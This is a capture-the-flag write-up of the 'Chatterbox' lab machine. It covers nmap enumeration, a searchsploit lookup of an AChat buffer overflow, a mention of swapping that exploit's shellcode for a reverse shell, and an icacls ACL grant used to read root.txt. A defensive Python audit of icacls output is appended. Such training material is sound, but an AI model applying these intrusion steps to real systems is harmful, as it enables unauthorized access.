# Chatterbox

### Initial Enumeration

```bash
# Nmap 7.70 scan initiated Mon Jul 29 17:20:46 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 9255,9256 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up (0.40s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 9256/tcp)
HOP RTT       ADDRESS
1   402.86 ms 10.10.14.1
2   404.26 ms 10.10.10.74

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 29 17:21:25 2019 -- 1 IP address (1 host up) scanned in 42.58 seconds
```

Searchsploit results for AChat:

```bash
$ searchsploit achat
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                                                                    | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)                                                       | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities                                          | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                                                            | exploits/php/webapps/24647.txt
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
```

Metasploit wasn't working for me, so I moved to the manual exploitation script, which launched the calculator; however, I changed the shellcode to launch a `windows/shell_reverse_tcp` shell to my Kali machine.

### User Own

```bash
C:\Users\Alfred\Desktop>type user.txt
type user.txt                        
72290***
```

### Root Own

On a little inspection, it turns out I can look at the Administrator folder; however, I cannot read the root.txt file from it. This seemed very odd.

```bash
 Directory of C:\Users\Administrator\Desktop

12/10/2017  07:50 PM    <DIR>          .
12/10/2017  07:50 PM    <DIR>          ..
12/10/2017  07:50 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,162,642,944 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
```

I checked the permissions I have on the Desktop folder as well as on the root.txt file. It turns out I have FULL control of the file and the folder; all I had to do was grant myself the permission to read the root.txt file.

```bash
C:\Users\Administrator>icacls Desktop
icacls Desktop                       
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)                                 
        CHATTERBOX\Administrator:(I)(OI)(CI)(F)                            
        BUILTIN\Administrators:(I)(OI)(CI)(F)                              
        CHATTERBOX\Alfred:(I)(OI)(CI)(F)                    

C:\Users\Administrator\Desktop>icacls "root.txt" /grant "Alfred":F         
icacls "root.txt" /grant "Alfred":F  
processed file: root.txt             
Successfully processed 1 files; Failed processing 0 files                  

C:\Users\Administrator\Desktop>type root.txt                               
type root.txt                        
a673d***
```
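
The misconfiguration above, seen from the defender's side, as an added example that is not part of the original write-up: a small Python audit that parses `icacls` output and reports principals outside an allowlist that hold rights allowing them to rewrite the ACL. The allowlist, the function names and the choice of `F`, `WDAC` and `WO` as the audited rights are assumptions of this example; the sample input is the `icacls Desktop` output shown above.

```python
import re

# Rights that let the holder rewrite the ACL or take ownership (assumed audit scope).
ACL_CONTROL = {"F", "WDAC", "WO"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Assumed allowlist; the profile owner is added per call.
EXPECTED = {r"NT AUTHORITY\SYSTEM", r"BUILTIN\Administrators"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([^)]+\))+)$")

# `icacls Desktop` output copied from the session above.
SAMPLE = r"""Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
        CHATTERBOX\Administrator:(I)(OI)(CI)(F)
        BUILTIN\Administrators:(I)(OI)(CI)(F)
        CHATTERBOX\Alfred:(I)(OI)(CI)(F)
"""

def parse_icacls(output, path):
    """Return [(principal, inherit_flags, rights)] for the allow ACEs of `path`."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path + " "):  # first ACE shares a line with the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # blank lines and the "Successfully processed" summary
        groups = re.findall(r"\(([^)]+)\)", m.group("flags"))
        if "DENY" in groups:
            continue  # deny ACEs grant nothing
        inherit = [g for g in groups if g in INHERIT_FLAGS]
        rights = set()
        for g in groups:
            if g not in INHERIT_FLAGS:
                rights.update(g.split(","))  # handles lists such as (RX,W)
        aces.append((m.group("who"), inherit, rights))
    return aces

def unexpected_acl_control(output, path, profile_owner):
    """Principals outside the allowlist that can change the ACL or owner."""
    allowed = {p.lower() for p in EXPECTED | {profile_owner}}
    return [(who, sorted(rights & ACL_CONTROL))
            for who, _inherit, rights in parse_icacls(output, path)
            if rights & ACL_CONTROL and who.lower() not in allowed]

if __name__ == "__main__":
    for who, rights in unexpected_acl_control(SAMPLE, "Desktop", r"CHATTERBOX\Administrator"):
        print(f"{who} holds {','.join(rights)} on Desktop")
```

Run against the page's output with `CHATTERBOX\Administrator` as the profile owner, the only finding is `CHATTERBOX\Alfred` with `F`, inherited onto child files and folders through `(OI)(CI)`.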

### Learning Outcome

Have a look at all the important files first and then determine your strategy. I wasted quite a while without realising that I had FULL access on the required folder.

